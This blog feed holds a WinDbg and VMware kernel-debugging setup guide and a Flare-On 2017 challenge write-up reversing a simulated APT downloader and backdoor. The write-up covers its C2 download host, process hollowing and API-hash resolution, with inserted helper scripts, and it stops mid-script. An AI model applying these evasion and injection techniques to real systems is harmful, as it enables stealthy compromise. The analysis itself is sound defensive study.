Lynn's Blog
2018-10-23T07:18:16+00:00
http://0x00.tw
Lynn Wu
0x000050@gmail.com
Setting up windows kernel-mode debugging with WinDbg and VMware
2018-10-20T00:00:00+00:00
http://0x00.tw/2018/10/20/Setting up windows kernel-mode debugging with WinDbg and VMware
<p>Since I have recently been learning about Windows kernel exploitation and reversing Windows drivers, I decided to take notes and write down my experience. This article covers configuring VMware and WinDbg, setting Windows boot options, WinDbg commands, and the WinDbg theme (todo). If you are also trying to debug Windows kernel mode via <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools">The Windows Debugger (WinDbg)</a>, this may be helpful to you.</p>
<h2 id="prerequisites">Prerequisites</h2>
<ul>
<li>Install a Windows OS in VMware.
<ul>
<li>[Method 1] Create a virtual machine from an ISO image. (I’ll be using <a href="https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation_pro/15_0">VMware Workstation</a>.)</li>
<li>[Method 2] A free download is also available from the <a href="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/">Microsoft VM download page</a>.</li>
</ul>
</li>
<li>Install <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools">WinDbg</a> on the host system.</li>
</ul>
<h2 id="configuring-for-vmware">Configuring for VMware</h2>
<p>The guest and host systems need a communication channel, so we use a <a href="https://docs.microsoft.com/en-us/windows/desktop/ipc/named-pipes">named pipe</a> to emulate a serial port (COM port). VMware lets us add a serial port backed by a named pipe to connect a virtual machine to an application, or to another virtual machine, running on the host system.</p>
<ul>
<li>Power off the virtual machine.</li>
<li>Right-click the debugger VM and select <code class="highlighter-rouge">Settings</code>.</li>
<li>Click the <code class="highlighter-rouge">Add</code> button in the “Virtual Machine Settings” dialog box, then select <code class="highlighter-rouge">Serial Port</code> and click <code class="highlighter-rouge">Next</code> in the “Add Hardware Wizard” dialog box.</li>
</ul>
<p><img src="https://i.imgur.com/87ulCRB.png" alt="" /></p>
<ul>
<li>On the next page, select <code class="highlighter-rouge">Output to named pipe</code> and click <code class="highlighter-rouge">Next</code>.</li>
</ul>
<p><img src="https://i.imgur.com/QiRUCi5.png" alt="" /></p>
<ul>
<li>Set a name for the named pipe and note it down; we will use it for WinDbg. For example: <code class="highlighter-rouge">\\.\pipe\win7_x64</code>. Select <code class="highlighter-rouge">This end is the server</code> and <code class="highlighter-rouge">The other end is an application</code>. Check <code class="highlighter-rouge">Connect at power on</code>, then click <code class="highlighter-rouge">Finish</code>.</li>
</ul>
<p><img src="https://i.imgur.com/e0nJSBJ.png" alt="" /></p>
<ul>
<li>After clicking Finish, check <code class="highlighter-rouge">Yield CPU on poll</code>.</li>
</ul>
<p><img src="https://i.imgur.com/uGeCVmF.png" alt="" /></p>
<ul>
<li>SpecialNote: the new serial port <code class="highlighter-rouge">Serial Port 2</code> corresponds to <code class="highlighter-rouge">COM2</code>. We will use this number when setting up <code class="highlighter-rouge">BCD</code>.</li>
</ul>
<p><img src="https://i.imgur.com/2FmI1lR.png" alt="" /></p>
<h2 id="windows-boot-guest-system">Windows Boot (Guest System)</h2>
<p>In Windows XP, we can modify <code class="highlighter-rouge">boot.ini</code> to change Windows startup options. From Windows 7 on, boot application settings are stored in <code class="highlighter-rouge">BCD</code>, and we can use <a href="https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/bcdedit-command-line-options">BCDedit</a> to modify the <code class="highlighter-rouge">BCD</code> file.</p>
<h3 id="windows-xp---bootini">Windows XP - <code class="highlighter-rouge">boot.ini</code></h3>
<ul>
<li><code class="highlighter-rouge">boot.ini</code> controls how the operating system is booted and any startup options.</li>
</ul>
<h3 id="windows-7--windows-10---boot-configuration-data-bcd">Windows 7 / Windows 10 - <code class="highlighter-rouge">Boot Configuration Data (BCD)</code></h3>
<ul>
<li>Run <code class="highlighter-rouge">cmd</code> as administrator and execute the following commands:</li>
<li>Use a serial port (COM port) as the channel between debugger and debuggee. The debugport number must match the VMware serial port setting; the serial port number we obtained above is <code class="highlighter-rouge">2</code>.</li>
</ul>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bcdedit /dbgsettings serial debugport:2
</code></pre></div></div>
<ul>
<li>Enable or disable the kernel debugger for the specified boot entry. The following command turns kernel debugging on:
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bcdedit /debug ON
</code></pre></div> </div>
</li>
<li>Restart the guest system.</li>
</ul>
<p>SpecialNote: we modify the existing boot entry instead of adding a new one, which saves some time when booting.</p>
<h2 id="windbg">WinDbg</h2>
<p>If everything goes well, we can run WinDbg from cmd.exe on the host system to start the debugging session:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>windbg -b -k com:pipe,port=\\.\pipe\win7_x64,resets=0
</code></pre></div></div>
<p>About <code class="highlighter-rouge">port</code>: if the debugger is running on the same computer as the virtual machine, use the following form for the port, where <code class="highlighter-rouge">PipeName</code> is the named pipe of the serial port we just configured. If you forget it, you can find it in VMware (<code class="highlighter-rouge">VM > Settings... > Serial Port 2 > Use named pipe</code>).</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\\.\pipe\PipeName.
</code></pre></div></div>
<p>For more details, refer to the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/attaching-to-a-virtual-machine--kernel-mode-">Microsoft page</a>.</p>
<h3 id="load-symbols-in-windbg">Load Symbols in WinDbg</h3>
<p>You can load symbols and save the symbol path as part of a workspace.</p>
<h4 id="method-1-load-symbols-by-windbg-menu">[Method 1] Load symbols by WinDbg menu</h4>
<ul>
<li><code class="highlighter-rouge">File</code> > <code class="highlighter-rouge">Symbol File Path...</code> (or press <code class="highlighter-rouge">Ctrl</code>+<code class="highlighter-rouge">S</code>)</li>
<li>Enter the symbol path and check <code class="highlighter-rouge">reload</code>. We usually download Microsoft’s symbols; if you have the symbols of your own application locally (a flat list of PDB files), you can load those as well. Note that a symbol path element must contain no spaces around the <code class="highlighter-rouge">*</code> separators.
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SRV*c:\Symbols*http://msdl.microsoft.com/download/symbols
</code></pre></div> </div>
</li>
</ul>
<h4 id="method-2-load-symbols-by-windbg-command-line">[Method 2] Load symbols by WinDbg Command line</h4>
<p>The first time, you need to download the symbols from Microsoft.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.sympath srv*c:\Symbols*https://msdl.microsoft.com/download/symbols
</code></pre></div></div>
<p>After that, you just need to set up the local symbol folder path and reload the symbol.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.symfix+ c:\symbols
.reload
</code></pre></div></div>
<h4 id="method-3-load-symbols-by-windows-environment-variable">[Method 3] Load symbols by Windows environment variable</h4>
<p>There is an environment variable called <code class="highlighter-rouge">_NT_SYMBOL_PATH</code> which can be set to a symbol path as well.</p>
<ul>
<li>SpecialNote: setting this environment variable affects WinDbg, Visual Studio, Process Explorer, Process Monitor, and potentially other software.</li>
</ul>
<h4 id="method-4-load-symbols-by-windows-commands">[Method 4] Load Symbols by Windows Commands</h4>
<p><code class="highlighter-rouge">WinDbg -y "<symbol path>"</code></p>
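<p>The four methods above all take the same symbol path syntax, and a stray space or a misplaced <code class="highlighter-rouge">*</code> makes the debugger look in the wrong place without an obvious error. The following parser is an added example, not code from the original post: it splits a symbol path into its elements (plain directory, <code class="highlighter-rouge">cache*dir</code>, <code class="highlighter-rouge">srv*cache*server</code>), rejects whitespace inside an element, and lists the local cache folders the debugger will write into. The element grammar it implements is the documented WinDbg one; the <code class="highlighter-rouge">SymbolSource</code> type and function names are this example's own.</p>

```python
# Added example for this post (not the author's code): a small parser for the
# WinDbg symbol path syntax, usable to sanity-check a path before it goes into
# File > Symbol File Path, .sympath, _NT_SYMBOL_PATH or windbg -y.
# Elements are ';'-separated. Each element is a plain directory, "cache*<dir>",
# or "srv*[<downstream cache>*]<server URL or share>".
import os
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class SymbolSource:
    kind: str                     # "dir", "cache" or "srv"
    path: Optional[str] = None    # directory for "dir" elements
    cache: Optional[str] = None   # local downstream store for cache/srv elements
    server: Optional[str] = None  # upstream symbol server for srv elements (None = debugger default)


def parse_symbol_path(sympath: str) -> List[SymbolSource]:
    """Split a symbol path into its elements, rejecting the whitespace mistakes
    that make the debugger silently look in the wrong place."""
    sources: List[SymbolSource] = []
    for raw in sympath.split(";"):
        if not raw:
            continue                      # tolerate a trailing ';'
        if any(ch.isspace() for ch in raw):
            raise ValueError(f"whitespace inside symbol path element: {raw!r}")
        parts = raw.split("*")
        head = parts[0].lower()
        if head == "srv":
            if len(parts) == 1 or parts[1:] == [""]:
                sources.append(SymbolSource("srv"))            # "srv" / "srv*": defaults
            elif len(parts) == 2:
                sources.append(SymbolSource("srv", server=parts[1]))
            elif len(parts) == 3:
                sources.append(SymbolSource("srv", cache=parts[1], server=parts[2]))
            else:
                raise ValueError(f"too many '*' in srv element: {raw!r}")
        elif head == "cache":
            if len(parts) != 2 or not parts[1]:
                raise ValueError(f"cache element needs exactly one directory: {raw!r}")
            sources.append(SymbolSource("cache", cache=parts[1]))
        elif len(parts) == 1:
            sources.append(SymbolSource("dir", path=raw))
        else:
            raise ValueError(f"unrecognised symbol path element: {raw!r}")
    return sources


def local_caches(sources: List[SymbolSource]) -> List[str]:
    """Directories the debugger will write downloaded PDBs into (create them up front)."""
    return [s.cache for s in sources if s.cache]


def symbol_path_from_environment() -> List[SymbolSource]:
    """Parse _NT_SYMBOL_PATH, the variable that method 3 sets for every tool on the box."""
    return parse_symbol_path(os.environ.get("_NT_SYMBOL_PATH", ""))


if __name__ == "__main__":
    for element in parse_symbol_path(r"srv*c:\Symbols*https://msdl.microsoft.com/download/symbols"):
        print(element)
    print("caches:", local_caches(symbol_path_from_environment()))
```

<p>Run it against the path you intend to use; a <code class="highlighter-rouge">ValueError</code> on the spaced variant of the menu example shows the kind of mistake the debugger itself would not flag.</p>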
<h3 id="enable-output-of-dbgprint">Enable Output of DbgPrint</h3>
<ul>
<li>start / run / <code class="highlighter-rouge">regedit</code></li>
<li>Add the key <code class="highlighter-rouge">Debug Print Filter</code> under <code class="highlighter-rouge">HKLM\SYSTEM\CCS\Control\Session Manager</code>.</li>
<li>Under this key (<code class="highlighter-rouge">HKLM\SYSTEM\CCS\Control\Session Manager\Debug Print Filter</code>), create a value named <code class="highlighter-rouge">DEFAULT</code> and set it to the DWORD value <code class="highlighter-rouge">0x0000ffff</code>.
<ul>
<li>SpecialNote: Do not set the value named as <code class="highlighter-rouge">default</code></li>
</ul>
</li>
</ul>
2017 Flare-On Challenge 12 missing (APT Attack Analysis)
2018-06-30T00:00:00+00:00
http://0x00.tw/2018/06/30/2017 Flare-On #12 missing
<p>The scenario of <code class="highlighter-rouge">missing</code> is an APT attack incident: to obtain the flag, we have to decrypt the captured packets and reverse the binaries in order to reconstruct the whole attack. This involves recovering the malware protocol, the malware config, the C2 server and client, victim information, the plugins (encryption / compression / command functionality), a BMP image, and more. The decryption code and the decrypted packet contents are attached in the appendices.</p>
<hr />
<p>Contents:</p>
<ul>
<li>Stage 0: Initial analysis
<ul>
<li>coolprogram.exe</li>
<li>20170801_1300_filtered.pacp</li>
</ul>
</li>
<li>Stage 1: Recovering the client (used to talk to the C2) by decrypting packets
<ul>
<li>Packet decryption</li>
<li>Process Hollowing</li>
</ul>
</li>
<li>Stage 2: Analyzing the C2 client (secondstage.exe)
<ul>
<li>Initialization function (a Windows shellcode technique)</li>
<li>Decrypting the configuration (malware config)</li>
<li>Communicating over a socket</li>
</ul>
</li>
<li>Stage 3: Downloading/installing plugins with the default command set (Processor default)
<ul>
<li>Command set</li>
<li>Victim machine information</li>
<li>Plugin information</li>
<li>Recovering the plugins</li>
</ul>
</li>
<li>Stage 4: Parsing the packet structure
<ul>
<li>Decrypt Header (size: 0x24)</li>
<li>Compress Header (size: 0x1c)</li>
<li>Processor Header (size: 0x24)</li>
</ul>
</li>
<li>Stage 5: Analyzing the plugins, decrypting packets and recovering the C2 server
<ul>
<li>Decrypt ID (CRPT)</li>
<li>Compress ID (COMP)</li>
<li>Processor ID (CMD)</li>
<li>C2 server (srv2.exe), pse.exe and cf.exe, and a summary of the client packets</li>
</ul>
</li>
<li>Stage 6: Decrypting the C2 server's packets
<ul>
<li>Decrypt ID (CRPT)</li>
<li>Compress ID (COMP)</li>
<li>Server information</li>
<li>Summary of the server packets</li>
</ul>
</li>
<li>Stage 7: Recovering lab10.zip.cry
<ul>
<li>Analyzing the encryption program cf.exe</li>
<li>Obtaining the flag</li>
</ul>
</li>
<li>Appendix 1: PacketDecode.py, the packet decryption script</li>
<li>Appendix 2: Full packet decryption: reconstructing the communication between the C2 server and the client
<ul>
<li>Client packet decryption</li>
<li>Server packet decryption</li>
</ul>
</li>
</ul>
<hr />
<h2 id="第零階段-初步分析">Stage 0: Initial analysis</h2>
<p>[missing] provides two files: a packet capture, <code class="highlighter-rouge">20170801_1300_filtered.pacp</code>, and a 32-bit PE file, <code class="highlighter-rouge">coolprogram.exe</code>.</p>
<h3 id="coolprogramexe"><code class="highlighter-rouge">coolprogram.exe</code></h3>
<p><code class="highlighter-rouge">Detect It Easy</code> shows that it is a PE file compiled from Delphi. After reversing it in IDA, we can infer that <code class="highlighter-rouge">coolprogram.exe</code> is a downloader: it downloads an encrypted file from a fixed URL (<code class="highlighter-rouge">maybe.suspicious.to/secondstage</code>), decrypts it and executes it.</p>
<h3 id="20170801_1300_filteredpacp"><code class="highlighter-rouge">20170801_1300_filtered.pacp</code></h3>
<p><code class="highlighter-rouge">20170801_1300_filtered.pacp</code> contains two TCP connections; Wireshark shows that IP <code class="highlighter-rouge">192.168.221.91</code> connects to IP <code class="highlighter-rouge">52.0.104.200</code>.</p>
<p><img src="https://i.imgur.com/NwPBTqf.png" alt="" /></p>
<ul>
<li>192.168.221.91:49815 <=> 52.0.104.200:80</li>
</ul>
<p>A GET request is sent to <code class="highlighter-rouge">maybe.suspicious.to/secondstage</code>, and the response body is encrypted, so this traffic is presumably the download of an encrypted file.</p>
<p><img src="https://i.imgur.com/5NBJS2n.png" alt="" /></p>
<ul>
<li>Stream: 192.168.221.91:49816 <=> 52.0.104.200:9443</li>
</ul>
<p><img src="https://i.imgur.com/o6vv4f8.png" alt="" /></p>
<h2 id="第一階段-透過封包解密還原-client-用於與-c2-溝通">Stage 1: Recovering the client (used to talk to the C2) by decrypting packets</h2>
<p>The goal of this stage is to use <code class="highlighter-rouge">coolprogram.exe</code> itself to decrypt the packet data and recover the encrypted file it carries; that file is presumably the client used to communicate with the C2.</p>
<ul>
<li>
<p>Analysis files</p>
<table>
<thead>
<tr>
<th>File Format</th>
<th>Name</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>Pcap</td>
<td>20170801_1300_filtered.pacp</td>
<td>192.168.221.91:49815 <-> 52.0.104.200:80</td>
</tr>
<tr>
<td>PE</td>
<td>coolprogram.exe</td>
<td>downloader</td>
</tr>
</tbody>
</table>
</li>
<li>
<p>Dump file</p>
<table>
<thead>
<tr>
<th>File Format</th>
<th>Name</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>PE</td>
<td>secondstage.exe</td>
<td>C2 Client</td>
</tr>
</tbody>
</table>
</li>
</ul>
<h3 id="封包解密">Packet decryption</h3>
<p>First, extract the encrypted data from the capture by exporting the HTTP object to a file (File > Export Objects > HTTP).</p>
<p><img src="https://i.imgur.com/dt5zXPo.png" alt="" /></p>
<p>We can write a simple Python socket server that hands the exported packet data to <code class="highlighter-rouge">coolprogram.exe</code> for decryption, and then retrieve the decrypted file. However, <code class="highlighter-rouge">coolprogram.exe</code> has the destination domain hard-coded as <code class="highlighter-rouge">maybe.suspicious.to</code>, so before setting up the Python socket we need to change that destination. One option is to patch the domain to localhost, but the drawback is that the patch has to be reapplied on every run, which is rather tedious.</p>
<p>So my approach is to edit the <code class="highlighter-rouge">hosts</code> file (on Windows it lives at <code class="highlighter-rouge">C:\WINDOWS\system32\drivers\etc\hosts</code>) to point <code class="highlighter-rouge">maybe.suspicious.to</code> at <code class="highlighter-rouge">127.0.0.1</code>. That way, <code class="highlighter-rouge">coolprogram.exe</code> connects to the local machine when it runs, and we can set up a Python socket to serve it the encrypted packet data.</p>
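<p>The socket step described above, as an added example that is not part of the original write-up: a minimal HTTP responder that, once the hosts entry is in place, replays the object exported from the capture to <code class="highlighter-rouge">coolprogram.exe</code> inside the analysis VM. It assumes the exported object is saved as <code class="highlighter-rouge">./secondstage</code> and that the sample requests <code class="highlighter-rouge">GET /secondstage</code> on port 80 as in the capture (binding port 80 needs administrator rights). The <code class="highlighter-rouge">loopback_check</code> helper exercises the same handler over a socket pair so the framing can be verified offline.</p>

```python
# Added example (not the write-up author's code): replay the exported HTTP
# object to the downloader in the lab. With maybe.suspicious.to mapped to
# 127.0.0.1 in the hosts file, coolprogram.exe's GET arrives here instead.
import socket

PAYLOAD_PATH = "secondstage"          # assumption: Wireshark export saved here
EXPECTED_TARGET = "/secondstage"      # request target seen in the capture


def parse_request_target(request: bytes) -> str:
    """Return the request target from the first line of an HTTP request."""
    line = request.split(b"\r\n", 1)[0]
    parts = line.split(b" ")
    if len(parts) < 2:
        raise ValueError("malformed request line")
    return parts[1].decode("ascii", "replace")


def build_http_response(body: bytes, status: str = "200 OK") -> bytes:
    """Frame body as an HTTP/1.1 response. Content-Length tells the client
    when the download is complete, exactly as the real server would."""
    headers = (
        f"HTTP/1.1 {status}\r\n"
        "Content-Type: application/octet-stream\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")
    return headers + body


def handle(conn: socket.socket, payload: bytes, expected_target: str = EXPECTED_TARGET) -> str:
    """Serve one connection: the payload for the expected path, 404 otherwise.
    Returns the status code served so callers can log it."""
    request = conn.recv(65536)
    target = parse_request_target(request)
    if target == expected_target:
        conn.sendall(build_http_response(payload))
        return "200"
    conn.sendall(build_http_response(b"", "404 Not Found"))
    return "404"


def loopback_check(request: bytes, payload: bytes):
    """Offline self-test: run handle() over a socket pair, return (status, client bytes)."""
    client, server = socket.socketpair()
    with client, server:
        client.sendall(request)
        status = handle(server, payload)
        server.shutdown(socket.SHUT_WR)
        data = b""
        while True:
            chunk = client.recv(65536)
            if not chunk:
                break
            data += chunk
    return status, data


def serve_once(payload_path: str = PAYLOAD_PATH, bind=("127.0.0.1", 80)) -> None:
    """Accept a single connection from the sample and serve the exported object."""
    with open(payload_path, "rb") as f:
        payload = f.read()
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(bind)
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            status = handle(conn, payload)
            print(f"{peer[0]}:{peer[1]} -> {status}, {len(payload)} bytes offered")


if __name__ == "__main__":
    serve_once()
```

<p>Start the script, then run <code class="highlighter-rouge">coolprogram.exe</code> in the VM and break in the debugger after the download; from there the write-up's IDAPython dump applies unchanged.</p>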
<p>Once the packet data has been handed to <code class="highlighter-rouge">coolprogram.exe</code> and decrypted, the next step is to extract the decrypted data. We need to know the file's size and its location, and then dump it with IDAPython. The decrypted file has the same size as the encrypted one, so running <code class="highlighter-rouge">dir</code> on the exported object (<code class="highlighter-rouge">secondstage</code>) tells us the size to dump is <code class="highlighter-rouge">119812</code>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\Lynn\Desktop\secondstage_pcap 的目錄
2018/06/20 下午 01:18 <DIR> .
2018/06/20 下午 01:18 <DIR> ..
2018/06/20 下午 01:17 119,812 secondstage
1 個檔案 119,812 位元組
2 個目錄 20,530,176,000 位元組可用
</code></pre></div></div>
<p>It is worth noting that the function <code class="highlighter-rouge">sub_410DE8</code> in <code class="highlighter-rouge">coolprogram.exe</code> implements Process Hollowing. Process Hollowing is a technique by which malware puppets a legitimate process. It works by creating a benign process as the target with <code class="highlighter-rouge">CreateProcess</code>, using a <code class="highlighter-rouge">CreationFlag</code> of <code class="highlighter-rouge">CREATE_SUSPENDED</code>; in <code class="highlighter-rouge">coolprogram.exe</code> the target is the default browser. The key step is to call <code class="highlighter-rouge">NtUnmapViewOfSection</code> to unmap the default browser's sections and map the malicious program into its memory instead, then set the entry point with <code class="highlighter-rouge">SetThreadContext</code>, and finally resume the browser with <code class="highlighter-rouge">ResumeThread</code>, which executes the malicious behaviour.</p>
<p><img src="https://i.imgur.com/cT1yGfh.png" alt="" /></p>
<p>As for the location, IDA shows that <code class="highlighter-rouge">sub_405D7c</code> performs a <code class="highlighter-rouge">memcpy</code>, and its second argument, <code class="highlighter-rouge">0x4E4AE8</code>, points at the start of a PE file (<code class="highlighter-rouge">MZ</code>).</p>
<p><img src="https://i.imgur.com/CLRXYp9.png" alt="" /></p>
<p>Knowing the size and location, we can dump <code class="highlighter-rouge">secondstage.exe</code> with IDAPython:</p>
<pre><code class="language-python">Python>file = GetManyBytes(0x4E4AE8, 119812)
Python>open("secondstage.exe", "wb").write(file)
</code></pre>
<p>This yields <code class="highlighter-rouge">secondstage.exe</code>, the client used to communicate with the C2.</p>
<h2 id="第二階段-分析-c2-client-secondstageexe">Stage 2: Analyzing the C2 client (<code class="highlighter-rouge">secondstage.exe</code>)</h2>
<p><code class="highlighter-rouge">secondstage.exe</code> is a backdoor with socket functionality, used to communicate with the C2. Its malicious capabilities come from downloading modules (plugins) and loading them to carry out those functions. In <code class="highlighter-rouge">Main</code> we see it first run an initialization function, then decrypt the configuration, and finally communicate over a socket.</p>
<h3 id="初始化函數">Initialization function</h3>
<p>First, note that the program uses a technique common in Windows shellcode: it resolves the addresses of the Windows APIs it needs from precomputed hashes of their names, which keeps the plaintext strings out of the binary and makes analysis harder. The function that resolves the hashes back to Windows APIs is <code class="highlighter-rouge">sub_405060</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">functions</span><span class="p">.</span><span class="n">version</span> <span class="o">=</span> <span class="mh">0x20170417</span><span class="p">;</span>
<span class="n">functions</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="mi">392</span><span class="p">;</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hkernel32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"kernel32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hntdll</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"ntdll"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hshell32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"shell32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">huser32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"user32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hadvapi32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"advapi32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hws2_32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"ws2_32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hgdi32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"gdi32"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">functions</span><span class="p">.</span><span class="n">hkernel32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hntdll</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hshell32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">huser32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hadvapi32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hws2_32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hgdi32</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">pdll</span> <span class="o">=</span> <span class="o">&</span><span class="n">functions</span><span class="p">.</span><span class="n">hkernel32</span><span class="p">;</span>
<span class="n">paddr</span> <span class="o">=</span> <span class="o">&</span><span class="n">functions</span><span class="p">.</span><span class="n">LoadLibraryA</span><span class="p">;</span>
<span class="n">num</span> <span class="o">=</span> <span class="n">dword_415690</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">phash</span> <span class="o">=</span> <span class="o">&</span><span class="n">dword_415690</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="k">while</span> <span class="p">(</span> <span class="n">num</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">num</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span>
<span class="p">{</span>
<span class="o">*</span><span class="n">paddr</span> <span class="o">=</span> <span class="n">GetProcAddressByHash</span><span class="p">(</span><span class="o">*</span><span class="n">pdll</span><span class="p">,</span> <span class="o">*</span><span class="n">phash</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!*</span><span class="n">paddr</span> <span class="p">)</span>
<span class="k">return</span> <span class="n">result</span><span class="p">;</span>
<span class="o">++</span><span class="n">phash</span><span class="p">;</span>
<span class="o">++</span><span class="n">paddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">++</span><span class="n">pdll</span><span class="p">;</span>
<span class="n">num</span> <span class="o">=</span> <span class="o">*</span><span class="n">phash</span><span class="p">;</span>
<span class="o">++</span><span class="n">phash</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">result</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">result</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>From this function we can see that the hash table is stored at <code class="highlighter-rouge">0x415690</code>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>25h, 0C8AC8026h, 1FC0EAEEh, 8F8F114h, 8F8F102h, 0F2FC4945h, 723EB0D5h, 67ECDE81h, 3D9972F5h, 95902B19h, 0D0498CD4h, 0D0498CC2h, 0B55AEA5Dh, 399354D8h, 6A3376B7h, 487FE16Bh, 0F3FD1C3h, 0C54374F3h, 6FB89AF0h, 6A582465h, 8D5A50CAh, 9E6FA842h, 69260152h, 12E88BC6h, 3DEF91ACh, 697A6AFEh, 3A35705Fh, 0BF78968Ah, 9C480E32h, 1297812Ch, 9802EF26h, 0A8D1FFE2h, 24C1C735h, 46318AD1h, 81D5763Eh, 32432452h, 279DEAC1h, 7B4842C1h, 0Ch, 5DB8FB17h, 5DBCF19Ah, 5DB8F59Eh, 4E58F56Fh, 2DD937DEh, 3DD92766h, 3E78F54Eh, 3E78F34Ah, 87B7BC52h, 0A84D25A0h, 0B81E8F04h, 728DA026h, 1, 0DF91E0A8h, 3, 0ABBC681Bh, 8EBEF5B1h, 7CBD2247h, 7, 8AD7DE22h, 453DB143h, 72760BB8h, 0B9D41C39h, 28E9E291h, 87FEDB50h, 5CB5EF72h, 13h, 0CDDE757Dh, 0E5971F6h, 0E797764h, 4C7C5841h, 939D7D9Ch, 0FC7AF16Ah, 8E9BF775h, 0EDD8FE8Ah, 8E878072h, 0D8923733h, 0C5A7764h, 9E7D3188h, 3C797B7Ah, 0D939F838h, 95E4A5D7h, 9400A044h, 0F44318C6h, 0B909D088h, 5D99726Ah, 6, 9E90B462h, 4894DAFCh, 0DF91A857h, 48B87EFCh, 6B3470D5h, 5AF0017Ch
</code></pre></div></div>
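<p>The loop in <code class="highlighter-rouge">sub_405060</code> and the table above together define a simple layout: a count, that many name hashes for the current DLL, then the count for the next DLL, until a count of 0. The following script is an added example, not the write-up author's code: it replays that walk in Python over the table copied from <code class="highlighter-rouge">0x415690</code>, groups the hashes per DLL in the order of the <code class="highlighter-rouge">LoadLibraryA</code> calls, and computes each resolved pointer's byte offset in the <code class="highlighter-rouge">FUNCTIONS</code> structure (the 13 DWORDs before <code class="highlighter-rouge">LoadLibraryA</code> are taken from that structure's definition). Two things are assumptions: the trailing 0 that terminates the table is not visible in the listing above, and the hash algorithm itself is not reproduced here, so the script groups and places hashes but does not resolve them to names.</p>

```python
# Added example (not the write-up author's code): mirror the table walk of
# sub_405060 so the name hashes can be grouped per DLL and mapped to their slot
# in the FUNCTIONS structure. HASH_TABLE is copied from the listing at 0x415690;
# the trailing 0 terminator is assumed (it is not shown in the listing).
from typing import Dict, List, Tuple

HASH_TABLE: List[int] = [
    0x25,
    0xC8AC8026, 0x1FC0EAEE, 0x08F8F114, 0x08F8F102, 0xF2FC4945, 0x723EB0D5, 0x67ECDE81,
    0x3D9972F5, 0x95902B19, 0xD0498CD4, 0xD0498CC2, 0xB55AEA5D, 0x399354D8, 0x6A3376B7,
    0x487FE16B, 0x0F3FD1C3, 0xC54374F3, 0x6FB89AF0, 0x6A582465, 0x8D5A50CA, 0x9E6FA842,
    0x69260152, 0x12E88BC6, 0x3DEF91AC, 0x697A6AFE, 0x3A35705F, 0xBF78968A, 0x9C480E32,
    0x1297812C, 0x9802EF26, 0xA8D1FFE2, 0x24C1C735, 0x46318AD1, 0x81D5763E, 0x32432452,
    0x279DEAC1, 0x7B4842C1,
    0x0C,
    0x5DB8FB17, 0x5DBCF19A, 0x5DB8F59E, 0x4E58F56F, 0x2DD937DE, 0x3DD92766, 0x3E78F54E,
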